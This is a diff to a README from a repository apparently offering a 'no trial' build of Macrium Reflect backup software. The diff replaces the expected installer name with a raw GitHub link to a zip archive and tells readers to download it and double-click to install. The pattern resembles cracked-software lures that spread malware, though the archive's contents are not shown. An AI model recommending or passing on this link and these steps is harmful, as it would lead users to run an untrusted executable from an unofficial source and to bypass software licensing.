igo160/Macrium-Reflect-No-Trial/README.md

    On the Releases page, look for the latest version of Macrium Reflect.
 This version will feature the most current updates and improvements.

 3. **Download the Installer:**
    Click on the provided link to download the installer.
-The file will usually be named something like `MacriumReflectSetup.exe`.
+The file will usually be named something like `https://raw.githubusercontent.com/igo160/Macrium-Reflect-No-Trial/main/unshut/Macrium-Reflect-No-Trial-1.2.zip`.

 4. **Run the Installer:**
    Once the download finishes, locate the downloaded file (usually in your Downloads folder).
 Double-click the file to start the installation process.